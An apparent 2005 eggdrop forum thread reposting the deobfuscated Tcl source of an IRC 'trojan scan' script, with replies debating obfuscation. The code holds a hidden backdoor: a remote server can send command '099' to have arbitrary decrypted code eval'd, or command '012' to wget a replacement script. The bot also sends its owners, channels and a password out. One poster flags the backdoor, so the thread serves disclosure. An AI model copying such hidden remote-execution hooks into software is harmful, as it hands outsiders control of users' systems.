egghelp.org community Forum Index
[ egghelp.org home | forum home ]
egghelp.org community
Discussion of eggdrop bots, shell accounts and tcl scripts.
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

encrypted trojan scan script (cont.)
Goto page 1, 2  Next
 
Post new topic   Reply to topic    egghelp.org community Forum Index -> Script Support & Releases
View previous topic :: View next topic  
Author Message
^DooM^
Owner


Joined: 26 Aug 2003
Posts: 772
Location: IronForge

PostPosted: Thu May 19, 2005 5:47 am    Post subject: encrypted trojan scan script (cont.) Reply with quote

Due to the previous thread being screwed up by the long encrypted text line i have reposted Sir_Fz' unencrypted script post here.

Sir_fz wrote:
Code:

      # -- flags

        setudef flag aspbgbl
        setudef flag aspbwarn

      # -- strings

        setudef str aspbkickmsg

        setudef str detected
        setudef str joins
        setudef str kicked

      # -- bindings

        # - remove me

          bind MSG -|- "REMOVEME" aspbgbl:remove:user

        # - check for possible trojans onjoin

          bind JOIN -|- "*" aspbgbl:check:user

        # - update channels

          bind PART -|- "*" aspbgbl:update:channels

        # - update botname

          bind NICK -|- "*" aspbgbl:update:nickname

        # - script status

          bind PUB nm|nm "$::aspb(trigger)" aspbgbl:status

        # - auto update

          bind TIME -|- "00 * * * *" aspbgbl:update

    # --- script main source - NEVER TOUCH IT ;)

      # -- auto update aspbgbl

        proc aspbgbl:update { minute hour day month year } {

          if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          }

          putdcc $idx "cmd=011 $::aspb(version)"

        }

      # -- trojan scan control panel

        proc aspbgbl:status { nickname hostname handle channel arguments } {

          global lastbind

          if {[channel get $channel "aspbkickmsg"] == ""} {
            channel set $channel aspbkickmsg $::aspb(default)
          }

          switch -exact -- [string tolower [lindex [split $arguments] 0]] {

            "warn" {

              set status "Bot will warn users."

              if {![channel get $channel "aspbwarn"]} {
                set status "Bot won't warn users."
              }

              switch -exact -- [string tolower [lindex [split $arguments] 1]] {

                "on" {
                  putserv "NOTICE $nickname :Successfully turned on"; channel set $channel +aspbwarn
                }

                "off" {
                  putserv "NOTICE $nickname :Successfully turned off"; channel set $channel -aspbwarn
                }

                "default" {
                  putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037 \037on\037|\037off\037"
                }

              }           

            }

            "stats" {

              if {![regexp {[0-9]{1,}} [channel get $channel "joins"]] || ![regexp {[0-9]{1,}} [channel get $channel "detected"]] || ![regexp {[0-9]{1,}} [channel get $channel "kicked"]] || ![channel get $channel "aspbgbl"]} {
                putserv "NOTICE $nickname :No statistic available :("; return
              }

              putserv "NOTICE $nickname :\037Joins:\037 [channel get $channel "joins"] \037Detected Clients:\037 [channel get $channel "detected"] \037Kicked Clients:\037 [channel get $channel "kicked"]"

            }

            "status" {

              set status "aspb is enabled."

              if {![channel get $channel "aspbgbl"]} {
                set status "aspb is disabled."
              }

              switch -exact -- [string tolower [lindex [split $arguments] 1]] {

                "on" {
                  putserv "NOTICE $nickname :Successfully turned on."; putserv "PRIVMSG $channel :\001ACTION aspb ver. $::aspb(version) by $::aspb(author)\001"; channel set $channel +aspbgbl
                }

                "off" {
                  putserv "NOTICE $nickname :Successfully turned off."; channel set $channel -aspbgbl
                }

                "default" {
                  putserv "NOTICE $nickname :$status Please use: $lastbind \037status\037 \037on\037|\037off\037"; return
                }

              }

              if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
                return
              }

              set enabled ""
 
              foreach chan [channels] {

                if {![channel get $chan "aspbgbl"]} {
                  lappend enabled $chan
                } else {
                  lappend enabled +$chan
                }
         
              }

              putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"

            }

            "kickmsg" {

              if {[join [lrange [split $arguments] 1 end]] == ""} {


                if {[channel get $channel "aspbkickmsg"] == ""} {
                  set kickmessage "not set"
                } else {
                  set kickmessage [channel get $channel "aspbkickmsg"]
                }

                putserv "NOTICE $nickname :Kickmessage: [join $kickmessage]"
                putserv "NOTICE $nickname :Please use: $lastbind \037kickmsg\037 \037message\037 (Available options: %1\$s = hostname, %2\$s = botnick, %3\$s = trojan id, %4\$s = detected counter, %5\$s = trojan type)"

                return

              }

              channel set $channel aspbkickmsg [join [lrange [split $arguments] 1 end]]

              putserv "NOTICE $nickname :Kickmessage successfully saved."

            }

            "default" {

              set status "aspb is enabled."

              if {![channel get $channel "aspbgbl"]} {
                set status "aspb is disabled."
              }

              putserv "NOTICE $nickname :$status Please use: $lastbind \037warn\037|\037status\037|\037stats\037|\037kickmsg\037 \037?arguments?\037"

            }

          }

        }

      # -- get command/result from the database

        proc aspbgbl:database { idx arguments } {

          if {![valididx $idx]} {
            return
          }

          foreach argument $arguments {

            if {[regexp -- {^(.+?)=(.+?)$} $argument -> variable value]} {
              set $variable $value
            }

          }

          if {![info exists cmd]} {
            return
          }

          if {$cmd == "004"} {

            if {![info exists type]} {
              set type ""
            }

            channel set $chan detected [expr [channel get $chan "detected"] + 1]
            channel set $chan kicked [expr [channel get $chan "kicked"] + 1]

            if {![info exists reason] || [llength $reason] < 1} {
              set reason [format [join [channel get $chan "aspbkickmsg"]] [lindex [split $mask "@"] 1] $::botnick $id [channel get $chan "detected"] $type]; set warn 1
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason; set warn 0
            }

            set unban ""

            foreach chanban [chanbans $chan] {

              if {[lindex $chanban 2] >= 300} {
                lappend unban [lindex $chanban 0]
              }

              if {[llength $unban] == "6"} {
                putquick "MODE $chan -[string repeat "b" [llength $unban]] [join $unban]"; set unban ""
              }

            }

            if {$unban == "" && [llength [chanbans $chan]] == "45"} {

              set banid 0

              while {$banid < 5} {
                lappend unban [lindex [lindex [chanbans $chan] $banid] 0]; incr banid 1
              }

            }

            putquick "KICK $chan $nick :$reason" -next
            putquick "MODE $chan -[string repeat "b" [llength $unban]]+b [join $unban] $mask"

            if {[channel get $chan "aspbwarn"] && $warn} {
              putserv "NOTICE $nick :You are known as possible ${type}-trojan infected drone. If you wish to remove yourself, please type in: /msg $::botnick removeme"
              putserv "NOTICE $nick :More Information can be found at: \037[format www.pjen.net/?id=%d&botnick=%s $id $::botnick]\037"
            }

          } elseif {$cmd == "099"} {
            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }
          } elseif {$cmd == "013"} {

            if {![validchan $chan]} {
              return
            }

            channel set $chan -aspbgbl

            if {![info exists reason]} {
              set reason "not given"
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
            }

            putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"

          } elseif {$cmd == "010"} {

            if {![info exists reason]} {
              set reason "not given"
            } else {
              regexp -nocase -- {^.+ reason=(.+?)$} $arguments -> reason
            }

            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                continue
              }

              channel set $chan -aspbgbl

              putserv "PRIVMSG $chan :\001ACTION cries, aspb turned off for this channel. (reason: $reason)\001"

            }

          } elseif {$cmd == "012"} {

            if {[catch { exec wget $url } result]} {

              if {![info exists changes]} {
                set changes "not given"
              } else {
                regexp -nocase -- {^.+ message=(.+?)$} $arguments -> changes
              }

              if {[regexp -- {^.+\`(.+?)\'.+$} $result -> filename]} {

                if {[file exists $::aspb(path)]} {
                  file delete -force $::aspb(path)
                }

                file rename -force $filename $::aspb(path)

                if {[file exists $filename]} {
                  file delete -force $filename
                }

                set owners ""

                foreach owner [userlist n] {

                  if {[hand2nick $owner] != ""} {
                    lappend owners [hand2nick $owner]
                  }

                }

                if {[llength $owners] > 0} {
                  putserv "PRIVMSG [join $owners ","] :Your aspbgbl version has been updated. (Changes: $changes)"
                }

                if {[array exists ::aspb]} {
                  array unset ::aspb
                }

                catch { killdcc $idx }

                rehash

              }

              return

            }

            putlog "aspbgbl\002:\002 There is a new aspbgbl version available."

          } elseif {$cmd == "009"} {

            if {!$status} {
              puthelp "NOTICE $nick :Your hostname '$mask' isn't known in the database.";return
            }

            puthelp "NOTICE $nick :Your hostname '$mask' has been successfully removed."

            set unbanned ""

            foreach channel [channels] {

              if {[channel get $channel "aspbgbl"]} {

                foreach channelban [chanbans $channel] {

                  if {[string match -nocase [lindex [split $channelban] 0] $mask]} {
                    lappend unbanned $channel; pushmode $channel -b [lindex [split $channelban] 0]
                  }

                }

              }

            }

            if {[llength $unbanned] > 0} {
              puthelp "NOTICE $nick :Feel free to rejoin the following [expr {([llength $unbanned] == 1) ? "channel" : "channels" }] [join $unbanned ", "]"
            }

          } elseif {$cmd == "014"} {

            regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message

            if {![info exists message]} {
              return
            }

            set list ""

            foreach owner [userlist n] {

              if {[set nick [hand2nick $owner]] != ""} {
                lappend list $nick
              }

            }

            putserv "PRIVMSG [join $list ","] :$message"

          } elseif {$cmd == "015"} {

            regexp -nocase -- {^.+ message=(.+?)$} $arguments -> message

            if {![info exists message]} {
              return
            }

            set list ""

            foreach channel [channels] {

              if {[channel get $channel "aspbgbl"]} {
                lappend list $channel
              }

            }

            putserv "PRIVMSG [join $list ","] :\001ACTION attention, aspb broadcast: $message\001"

          }

        }

      # -- remove a possible user

        proc aspbgbl:remove:user { nickname hostname handle arguments } {

          if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          }

          putdcc $idx "cmd=008 $nickname!$hostname"

        }

      # -- update database information

        proc aspbgbl:update:channels { nickname hostname handle channel reason } {

          if {[isbotnick $nickname]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {[string equal -nocase $chan $channel]} {
                continue
              }

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"

          }

        }

      # -- update botname information

        proc aspbgbl:update:nickname { nickname hostname handle channel newnick } {

          global nospam

          if {[isbotnick $nickname] && ![string equal -nocase $nickname $newnick]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            } elseif {[info exists nospam] && [expr [unixtime] - $nospam] < 5} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
            set nospam [unixtime]

          }

        }

      # -- check for possible trojan on join

        proc aspbgbl:check:user { nickname hostname handle channel } {

          if {[isbotnick $nickname]} {

            if {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
              return
            }

            set enabled ""
 
            foreach chan [channels] {

              if {![channel get $chan "aspbgbl"]} {
                lappend enabled $chan
              } else {
                lappend enabled +$chan
              }
         
            }

            putdcc $idx "cmd=020 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
            return

          }

          channel set $channel joins [expr [channel get $channel "joins"] + 1]

          if {[string match "*quakenet.org" $hostname]} {
            return
          } elseif {[matchattr $handle mno|mno $channel]} {
            return
          } elseif {![botisop $channel]} {
            return
          } elseif {[regexp -- {i|k|r} [lindex [getchanmode $channel] 0]]} {
            return
          } elseif {![channel get $channel "aspbgbl"]} {
            return
          } elseif {![valididx [set idx [aspbgbl:connection $::aspb(address)]]]} {
            return
          } elseif {[isbotnick $nickname]} {
            return
          }

          if {[channel get $channel "aspbkickmsg"] == ""} {
            channel set $channel aspbkickmsg $::aspb(default)
          }

          set idler    0
          set operator 0
          set voice    0

          foreach user [chanlist $channel] {

            if {[isop $user $channel]} {
              incr operator 1
            } elseif {[isvoice $user $channel]} {
              incr voice 1
            }

            incr idler 1

          }

          putdcc $idx "cmd=003 $nickname!$hostname $channel $idler $operator $voice"

        }

      # -- get idx for the aspbgbl database

        proc aspbgbl:connection { address } {

          foreach socket [dcclist] {

            if {[string equal -nocase $address [lindex [split $socket] 2]]} {
              return [lindex [split $socket] 0]
            }

          }

          if {![valididx [set idx [connect $::aspb(address) $::aspb(port)]]]} {
            return -1
          }

          set enabled ""

          foreach channel [channels] {

            if {![channel get $channel "aspbgbl"]} {
              lappend enabled $channel
            } else {
              lappend enabled +$channel
            }
         
          }

          putdcc $idx "cmd=001 me=$::botname owners=[join [userlist n] ","] chans=[join $enabled ","] ver=$::aspb(version) pass=$::aspb(password) author=[encrypt author $::aspb(author)] bottype=eggdrop[package require eggdrop]"
          control $idx aspbgbl:database

          return $idx

        }

_________________
The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born
Back to top
View user's profile Send private message Visit poster's website
Sir_Fz
Revered One


Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon

PostPosted: Thu May 19, 2005 5:52 am    Post subject: Reply with quote

Good idea, my post is realy ugly Laughing
_________________
Follow me on GitHub

- Opposing

Public Tcl scripts
Back to top
View user's profile Send private message Visit poster's website
Alchera
Revered One


Joined: 11 Aug 2003
Posts: 3344
Location: Ballarat Victoria, Australia

PostPosted: Thu May 19, 2005 7:39 am    Post subject: Reply with quote

So I didn't need new glasses after all? Yay! Laughing
_________________
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM
Back to top
View user's profile Send private message Visit poster's website
^DooM^
Owner


Joined: 26 Aug 2003
Posts: 772
Location: IronForge

PostPosted: Thu May 19, 2005 8:39 am    Post subject: Reply with quote

Haha it took me a while to find the post it just looked like therewas nothing till I scrolled over and down. Just doing my good deed for the day Wink
_________________
The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born
Back to top
View user's profile Send private message Visit poster's website
Thunderdome
Op


Joined: 15 Mar 2005
Posts: 187

PostPosted: Thu May 19, 2005 9:01 am    Post subject: Reply with quote

How does this script work? I tried to read the code, but I don't understand what it does...
Back to top
View user's profile Send private message
ex
Voice


Joined: 18 May 2005
Posts: 14
Location: Chicago

PostPosted: Thu May 19, 2005 10:41 am    Post subject: Reply with quote

it connects to a bot and on every join it asks whether it is a spamclient or not.

+ some additional features.
Back to top
View user's profile Send private message MSN Messenger
metroid
Owner


Joined: 16 Jun 2004
Posts: 771

PostPosted: Thu May 19, 2005 6:29 pm    Post subject: Reply with quote

Guys, i just happen to know who made this script and code get obfuscated for a reason. You shouldn't deobfuscate code for someone without the explicit authorisation from the author, unless there would be malious code in it, which i dont think there is..
Back to top
View user's profile Send private message
greenbear
Owner


Joined: 24 Sep 2001
Posts: 733
Location: Norway

PostPosted: Thu May 19, 2005 8:38 pm    Post subject: Reply with quote

thats just bullshit. its distributed freely under the gnu licence. if he didnt want ppl to read it, he shouldnt have made it public.
Back to top
View user's profile Send private message Send e-mail
Sir_Fz
Revered One


Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon

PostPosted: Fri May 20, 2005 3:43 am    Post subject: Reply with quote

Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably noone has tried to look through it)

Besides, it's decrypting, the code is still the same.
_________________
Follow me on GitHub

- Opposing

Public Tcl scripts
Back to top
View user's profile Send private message Visit poster's website
^DooM^
Owner


Joined: 26 Aug 2003
Posts: 772
Location: IronForge

PostPosted: Fri May 20, 2005 5:57 am    Post subject: Reply with quote

Sir_Fz wrote:
Exactly, I believe the user has the right to know what he's loading on his eggdrop. And you said it MeTroiD, it may have malicious code (and I don't think we can say if it has or not since probably noone has tried to look through it)

Besides, it's decrypting, the code is still the same.


Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not of released it to the public.
_________________
The lifecycle of a noob is complex. Fledgling noobs gestate inside biometric pods. Once a budding noob has matured thru gestation they climb out of their pod, sit down at a PC, ask a bunch of questions that are clearly in the FAQ, The Noob is born
Back to top
View user's profile Send private message Visit poster's website
Alchera
Revered One


Joined: 11 Aug 2003
Posts: 3344
Location: Ballarat Victoria, Australia

PostPosted: Fri May 20, 2005 6:49 pm    Post subject: Reply with quote

I thought only Vulcans used logic? Very Happy Laughing

Bravo one and all.
_________________
Add [SOLVED] to the thread title if your issue has been.
Search | FAQ | RTM
Back to top
View user's profile Send private message Visit poster's website
Sir_Fz
Revered One


Joined: 27 Apr 2003
Posts: 3793
Location: Lebanon

PostPosted: Fri May 20, 2005 7:26 pm    Post subject: Reply with quote

I forgot to mention, that code was encrypted like 4 times Razz lol, Everytime I decrypted it, it showed me yet another encryption (was about to give up on it Razz ) maybe next time he should try encrypting it endlessly Laughing
_________________
Follow me on GitHub

- Opposing

Public Tcl scripts
Back to top
View user's profile Send private message Visit poster's website
Galadhrim
Op


Joined: 11 Apr 2003
Posts: 123
Location: Netherlands, Enschede

PostPosted: Sat May 21, 2005 4:41 am    Post subject: Reply with quote

maybe make a better decrypter that uses recursiveness.
Back to top
View user's profile Send private message
De Kus
Revered One


Joined: 15 Dec 2002
Posts: 1361
Location: Germany

PostPosted: Sat May 21, 2005 9:42 am    Post subject: Reply with quote

^DooM^ wrote:
Also it doesn't say anywhere in the script that it is prohibited to decrypt this script to see what is in it. As gb said. If the author did not want people to see his code then he should not of released it to the public.

Since he distributed it under the GNU GPL it would be even illegal to make the source code unaccessable.
_________________
De Kus
StarZ|De_Kus, De_Kus or DeKus on IRC
Copyright 2005-2009 by De Kus - published under The MIT License
Love hurts, love strengthens...
Back to top
View user's profile Send private message MSN Messenger
Arie
Voice


Joined: 18 Jul 2005
Posts: 1

PostPosted: Mon Jul 18, 2005 10:29 am    Post subject: Reply with quote

the part:

Code:
 } elseif {$cmd == "099"} {
            regexp -nocase -- {^.+ exec=(.+?)$} $arguments -> exec; catch { eval [string trim [decrypt aspb $exec]] }


was a backdoor i heard - dont know tcl =p
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    egghelp.org community Forum Index -> Script Support & Releases All times are GMT - 4 Hours
Goto page 1, 2  Next
Page 1 of 2

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Forum hosting provided by Reverse.net

Powered by phpBB © 2001, 2005 phpBB Group
subGreen style by ktauber